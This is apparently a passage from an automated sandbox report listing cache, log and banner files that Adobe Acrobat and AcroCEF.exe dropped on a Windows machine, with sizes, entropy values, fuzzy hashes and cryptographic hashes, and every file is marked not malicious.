SHA-512: | 4316B2B1B2677D51C8089DC870E31375EB24AE0068F1716F4574AD33099CF494F9A64EA3A92A9C3F653038F954876B1E0B269DF1059FD3A6569BD5E970C1BE88 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.194650544557194 |
Encrypted: | false |
SSDEEP: | 6:iO45Yq2PN72nKuAl9OmbnIFUtS5UhZmws5tZkwON72nKuAl9OmbjLJ:7ZvVaHAahFUtdh/M5OaHAaSJ |
MD5: | 05EDA194FF338A52361AE4A7259E6A55 |
SHA1: | 02BE3216C32A60F5C837B4E69422E2131502405C |
SHA-256: | 38C0748F2579366CAE7AA1EEF1A081FBA32F45CD0A1229141E53226754ACFB2C |
SHA-512: | 54BA1AFA6BF84E303F02B85843718FD411AEDADCE406640A571B23584618293BAF526598114C39A3E59D14609CE8BC7682400150ECA526546CEEF199217BBB05 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.194650544557194 |
Encrypted: | false |
SSDEEP: | 6:iO45Yq2PN72nKuAl9OmbnIFUtS5UhZmws5tZkwON72nKuAl9OmbjLJ:7ZvVaHAahFUtdh/M5OaHAaSJ |
MD5: | 05EDA194FF338A52361AE4A7259E6A55 |
SHA1: | 02BE3216C32A60F5C837B4E69422E2131502405C |
SHA-256: | 38C0748F2579366CAE7AA1EEF1A081FBA32F45CD0A1229141E53226754ACFB2C |
SHA-512: | 54BA1AFA6BF84E303F02B85843718FD411AEDADCE406640A571B23584618293BAF526598114C39A3E59D14609CE8BC7682400150ECA526546CEEF199217BBB05 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.166715449197819 |
Encrypted: | false |
SSDEEP: | 6:iO45pjq2PN72nKuAl9Ombzo2jMGIFUtS5FZmws59IFkwON72nKuAl9Ombzo2jMmd:7YvVaHAa8uFUtC/qE5OaHAa8RJ |
MD5: | 17DDEA13DBE72D60DB95B9D569A1C0A9 |
SHA1: | 1FE729C153BB88691BE59018FEE825AF6F596A56 |
SHA-256: | 48A6BD8FBBF7AFD73B893BDDE4EA53034683D1FFF9F3C2BEF99A82C233287524 |
SHA-512: | DC578A05710AA8AC72EDE4439F26FD7B4243C227D84CE00016C2034F810F6EE52FBA072CF1740CA8B7720FF63DF8B4F89C1EFBACF6BFB7030F93B13FB1F89B3D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.166715449197819 |
Encrypted: | false |
SSDEEP: | 6:iO45pjq2PN72nKuAl9Ombzo2jMGIFUtS5FZmws59IFkwON72nKuAl9Ombzo2jMmd:7YvVaHAa8uFUtC/qE5OaHAa8RJ |
MD5: | 17DDEA13DBE72D60DB95B9D569A1C0A9 |
SHA1: | 1FE729C153BB88691BE59018FEE825AF6F596A56 |
SHA-256: | 48A6BD8FBBF7AFD73B893BDDE4EA53034683D1FFF9F3C2BEF99A82C233287524 |
SHA-512: | DC578A05710AA8AC72EDE4439F26FD7B4243C227D84CE00016C2034F810F6EE52FBA072CF1740CA8B7720FF63DF8B4F89C1EFBACF6BFB7030F93B13FB1F89B3D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.977149522061034 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sql/sBdOg2Hucaq3QYiubcP7E4T3y:Y2sRds7dMHR3QYhbA7nby |
MD5: | 112614A786CA0B9AAEE99D5B14AA255B |
SHA1: | 7A50BC902225882F1D84034E3B3F212A0EEC3B80 |
SHA-256: | 480599C90CF4CA0416B7F4638B422DA4AAF4F3FD0EB0C504F03491558988F4AB |
SHA-512: | 07E7F4D9F9F4F80D645319CADBBA97C11B0D06101E75A531C18CB322A52EB484BC832B07379B2A40E672464741D336EEDE1DA095E5750DEFFE2652E575C01796 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f008cc6e-3e17-460c-8a22-be48c7626014.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.977149522061034 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sql/sBdOg2Hucaq3QYiubcP7E4T3y:Y2sRds7dMHR3QYhbA7nby |
MD5: | 112614A786CA0B9AAEE99D5B14AA255B |
SHA1: | 7A50BC902225882F1D84034E3B3F212A0EEC3B80 |
SHA-256: | 480599C90CF4CA0416B7F4638B422DA4AAF4F3FD0EB0C504F03491558988F4AB |
SHA-512: | 07E7F4D9F9F4F80D645319CADBBA97C11B0D06101E75A531C18CB322A52EB484BC832B07379B2A40E672464741D336EEDE1DA095E5750DEFFE2652E575C01796 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.251881097297278 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7HsNCB:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhj |
MD5: | F8D9E2503F0A992333DBDCB213CE9E3A |
SHA1: | 3E44A1BFD263708765DB89404C314C5B98D86ED5 |
SHA-256: | 092A65EDDFC3098801954287ED118EE311AA52A92F61070A61925E280A3001F6 |
SHA-512: | 75FC7B2E10A520852477E64883337E53A4225A7CE06089FC0D0320584DF5C91C78C2D69963364206A2D7D5CF85C05086A8E9090F2989EE717AFD0CC5709568CD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.195314559487888 |
Encrypted: | false |
SSDEEP: | 6:iO45mjFZOq2PN72nKuAl9OmbzNMxIFUtS5/FUkZmws5ikwON72nKuAl9OmbzNMFd:7bUvVaHAa8jFUtnk/p5OaHAa84J |
MD5: | 44B42355A22A5A04C97F37EDCA886E2D |
SHA1: | A97CA2D355F1187183A850B007A715AE77754CE4 |
SHA-256: | 076B57910D9E34D59684F3505C184975D8C864D6460FF897BF1F77CA6D9D9AFB |
SHA-512: | 62510E95791F8EE57901125312662CB47854B282D86C4E3490B47577598CB6190E851C49B6031DBD1721C0B28C837B77454A2D2B53C5C57595EA43B2EB0113DF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.195314559487888 |
Encrypted: | false |
SSDEEP: | 6:iO45mjFZOq2PN72nKuAl9OmbzNMxIFUtS5/FUkZmws5ikwON72nKuAl9OmbzNMFd:7bUvVaHAa8jFUtnk/p5OaHAa84J |
MD5: | 44B42355A22A5A04C97F37EDCA886E2D |
SHA1: | A97CA2D355F1187183A850B007A715AE77754CE4 |
SHA-256: | 076B57910D9E34D59684F3505C184975D8C864D6460FF897BF1F77CA6D9D9AFB |
SHA-512: | 62510E95791F8EE57901125312662CB47854B282D86C4E3490B47577598CB6190E851C49B6031DBD1721C0B28C837B77454A2D2B53C5C57595EA43B2EB0113DF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444696068731936 |
Encrypted: | false |
SSDEEP: | 384:SeMci5tsiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:0Ls3OazzU89UTTgUL |
MD5: | 12B4C7365C3CF71109212C8425C320D3 |
SHA1: | E88D9E92DD91E14D3029926628C5BD4B310A199F |
SHA-256: | B080548CC6F8C7FA83BA3052B2E2486BE2B479F6B0FA010AEB2EF672D44021CE |
SHA-512: | 08185C223B0AF6F87BC95C8FF8EB44CB247B958F56D42118CEEBD5A064A1DA40DA7C4C2F6821084D2840CC8DFDC5A3EA837FB1971D2D34386F8BACE772AD7303 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213023059548708 |
Encrypted: | false |
SSDEEP: | 24:7+txqwnuwK+4qLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfQ:7MxxnCJqPmFTIF3XmHjBoGGR+jMz+LhI |
MD5: | EB723D725F20537B98FA1EB017746FB3 |
SHA1: | A1C269424BFBC2FE59930DB073ADDB48C801FF7F |
SHA-256: | 0EEDF7ACE29DA84ABA06E5844151EC58CF11976D1FCB934C5146EEE4648C6D0E |
SHA-512: | 55D6F5BEC960361F13BA0EFE9C687A5B0B28FF274A05BC5364B8B0C0F0CAA88F8C6DDAF0FCE228826F6FD884B783D53F0ABEE157723D0EF3DBCC1DF88A669940 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7608141181749795 |
Encrypted: | false |
SSDEEP: | 3:kkFkl41nbPtfllXlE/HT8k1hvNNX8RolJuRdxLlGB9lQRYwpDdt:kKh1DeT8qNMa8RdWBwRd |
MD5: | 78E784FF24B6872C55D1BAF6BAEA5D84 |
SHA1: | FF41A32D094840106B69E83BCBE0AF8D1964C448 |
SHA-256: | F1D4BA36D235FF4A0D34A51045CFECA81A71D3A729B56F751A9E89861AA64B73 |
SHA-512: | 5CE4181D6E8C8EF26795B80CD9619CD8E9E111D74147A5C681371B9025F0EEF41F46DF1D4618B69A953101F3FAE3671F9230AEE6016751C198494CFD22B883A6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.2429904267830576 |
Encrypted: | false |
SSDEEP: | 6:kKu/L9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:2/iDImsLNkPlE99SNxAhUe/3 |
MD5: | D1AA6F0C35E92C681C94B8E2D2B4999A |
SHA1: | DD39D4A13072303E68BEDD0A443F139534338A29 |
SHA-256: | 61AE64709950C6ABA91F047F2DB637BD42136A66F24E53A59B7D6300CFC23489 |
SHA-512: | 06F3754283D6F6A2299E77BB68385C5216E3F5A3E7445C6E751153FBE94862391F85D5E33CEB3F55D98C6D45A21D78BC8D5906561F648F84EFDADCFE4B9C99FA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.367966830479995 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJM3g98kUwPeUkwRe9:YvXKXsM3N810ctGMbLUkee9 |
MD5: | 085ADAE353132E4FD580D433443F82DB |
SHA1: | F58397B043976E9064B90603D47087E2C7319A61 |
SHA-256: | 7C34269D708F54AC2AF2326B0689AA60587090CFFC4C983D37F1C17DABEDCFEA |
SHA-512: | 5393AB104D770489D406B38B0D2EB71CB74A7A6BD0FF1A45F0E7E889E6B00A0246F044C4CCED7DE6A883E54F541D5428B25C60FDA69F08AF255B2AF5312A5558 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.318754754312013 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfBoTfXpnrPeUkwRe9:YvXKXsM3N810ctGWTfXcUkee9 |
MD5: | 3513C73A1B681A37F2A538CFB9228579 |
SHA1: | 80DFA0C1C1FD41934321507D48364499982FED96 |
SHA-256: | 09D5D927AC33BD49CD8D4BFEB1FE5FE2E8E6B86A18537033596501880318FA80 |
SHA-512: | 690D4AFFD6209C4804A4907A63F7F5F9781052F3A881D75C2051708DAE66D3CC05B291C12F04FA899CC0B86E3E36A7DD56A92199690C0D1049077E0875469507 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2987724711283715 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfBD2G6UpnrPeUkwRe9:YvXKXsM3N810ctGR22cUkee9 |
MD5: | 7E17EC6816F0BCE3291A62BA4D3DB19F |
SHA1: | 9A9B78A272AD6A478CFEDBB7BE0A1C94493034ED |
SHA-256: | 814D3CB62A9762C9B99F8FDAA1D373C063AC48EA707E050F93198B813EF8AC11 |
SHA-512: | 19855D9AE387D472BBE9AF7314833166329F2935CE6B3B0216D9481FBE8A3FF85DA6E86ED076430774ADC69FD5706B29FD57B54291B99B33042572D911A3ECDC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.3481509305005215 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfPmwrPeUkwRe9:YvXKXsM3N810ctGH56Ukee9 |
MD5: | 787D53F86AD9F676C9CC0FB24586D277 |
SHA1: | BCCBBEA7DD0C19B6484E52B4FAA16FC038E93E57 |
SHA-256: | 556AB4D3E80C4753DECC342E366036E5561181E6B4A2655C9BD655C29107DF55 |
SHA-512: | DD9594B9C6504073728F0BEBCC9EF46DDA390244B802B635C1B5488B995A311727D0530AEDB193ADEAE8D298DBBE0E501686C6DF85681AF7CA2D5B3F426ABBEA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.688482669903155 |
Encrypted: | false |
SSDEEP: | 24:Yv6XsMdqZSpLgE9cQx8LennAvzBvkn0RCmK8czOCCStn:YvTMd/hgy6SAFv5Ah8cv/t |
MD5: | D74F8DD6478E182FA8AB5E68B97E11FB |
SHA1: | 5BD5049BFCF5945E80B71246314843659278C3C2 |
SHA-256: | 1F201211F66C26794227FAD9B7668F939DF41E560D54D82B6EA23664F776C28F |
SHA-512: | 8AD6C75A7817C39FA0756362E54CB2DF6C732F539A3182E7B89D2F60C53B065C41F24C1E400625B0FD8FB66BAF23725B4297C2787A030B1F24C3CF0CD12929B4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.298222046007801 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJf8dPeUkwRe9:YvXKXsM3N810ctGU8Ukee9 |
MD5: | F749F194CF16E74FB3EEAC26620E2CED |
SHA1: | 0C8E3EF7D3BE6E7CB8842117DDC1EB3A883350BC |
SHA-256: | D45CE245BA7EF5C386107E070287E9DDDEF1FF490C3EDEB5EBB1D59D51998CF5 |
SHA-512: | 27EF5A913992AC5ADAEEA9FCDF9CD851F6202B32FA0929B6DE9D92FE5CF7AFC08C2A462BDFF9FA6BF2EDCEEF557556E59E8171344EC0297995A55584761793AC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.300048781743026 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfQ1rPeUkwRe9:YvXKXsM3N810ctGY16Ukee9 |
MD5: | AAE405A7D029FEDE0E54766F8EE2E298 |
SHA1: | FB86052330723510EDB54BF218F1AF7D19B101AA |
SHA-256: | 8C5D06A0C38EFE77C83E7C5CD888B5B3425D33174A5B13DA41B23B1C3DCCA8DE |
SHA-512: | 17CD1AC1E8ED88DB9A3E9403524C6FC1D221B91ED7A4A36925908237A54C930FA0736C5F7B3E09C1772B81FD3F88C8C582270C7AC4040C6E73571D4CD33C4B81 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3086559003164 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfFldPeUkwRe9:YvXKXsM3N810ctGz8Ukee9 |
MD5: | 2563A1613EF93DA3FE1D0BEAF1CE6F47 |
SHA1: | 27AF24D27A27D3D88BF285376396BA96DA2A65F7 |
SHA-256: | 711E319B764F83BC112DE8A29AF32EEDC3380560B2C64072C81367A235299337 |
SHA-512: | 0D7CE1775235EA5A92A625E65AE9724B6501E3E70EF57BA416820B62D81EB96CDEE07E2967E29E9FF21E0E0734B230555020FA38545064E81353B7EEF129DC79 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.323658890459985 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfzdPeUkwRe9:YvXKXsM3N810ctGb8Ukee9 |
MD5: | FC89640B28BB0D4C6F3F41C215DE1001 |
SHA1: | B7A5B10B6B70D32C9281B3D1C51D84668086D63A |
SHA-256: | D6146959BE32BB179EE7E5A4676DB6C8AFD1E705384C7C0F9FCE8EC5EE142B88 |
SHA-512: | 4DBD01ABE315DA6DD7E06CE45DC1DCE9527903073FABDC8FA35708841EAFDCA395534BC8AA020608088C83A064905637477AD3C6031B1F3D0DFCA0AAAF36BD3F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.304097990305639 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfYdPeUkwRe9:YvXKXsM3N810ctGg8Ukee9 |
MD5: | 3CCD48E5AB049A45879613E9B31AD09B |
SHA1: | E5D7736DD5B27A358FBCC344241A9EF3F44175AE |
SHA-256: | 097B4F42D430782F7059B168C5376FF3979A89F6AAFE8444BD5C2D668BB03E68 |
SHA-512: | F7DD58DAC9F248C7E6482C6B1C28B753F8EDCBCA6D27F3A34954754A664956D748530D16D35A0B23D0BD2162BD1E839C93635613105E7F0C8507499CB4869693 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.29106935183482 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJf+dPeUkwRe9:YvXKXsM3N810ctG28Ukee9 |
MD5: | 61126CD3FA795407519D695F9FE6EFD0 |
SHA1: | 140E2FEBDB61714A32000524382F83D1C6591A0A |
SHA-256: | BE741E9018299D03488885F3723888A67ECBB86B8E9EAE4C5F7E4B39841E1FD7 |
SHA-512: | 12ABDAD8AB1494C513D241B70A98EAA9B83A0B20E92F5923A513BD4B36FEB4D87D24B60ADFDA291303A269FF5E1688475314DD0DCB6677D6C46C01D96ECDAF48 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.287616923097676 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXsM8SN8pn0nZiQ0Yg1BKoAvJfbPtdPeUkwRe9:YvXKXsM3N810ctGDV8Ukee9 |
MD5: | 3419F3F36E4DA8847C3EDB694F0B4CFB |
SHA1: | EF454597F3405A780D9A77E8E25328FBA874CCE3 |
